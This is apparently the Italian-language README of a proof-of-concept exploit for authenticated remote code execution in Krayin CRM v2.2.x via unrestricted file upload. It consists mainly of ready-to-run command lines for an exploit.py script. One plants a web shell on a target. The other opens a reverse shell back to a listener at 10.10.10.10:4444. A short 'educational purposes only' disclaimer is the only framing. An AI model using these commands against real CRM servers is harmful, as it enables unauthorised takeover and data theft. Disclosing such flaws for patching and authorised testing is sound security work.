
Proof-of-concept exploit per esecuzione remota di codice autenticata in Krayin CRM v2.2.x tramite upload di file senza restrizioni, con supporto per payload web shell e reverse shell.
Script PoC per la vulnerabilità critica in Krayin CRM v2.2.x che consente RCE autenticato tramite upload di file senza restrizioni.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
Solo a scopo educativo.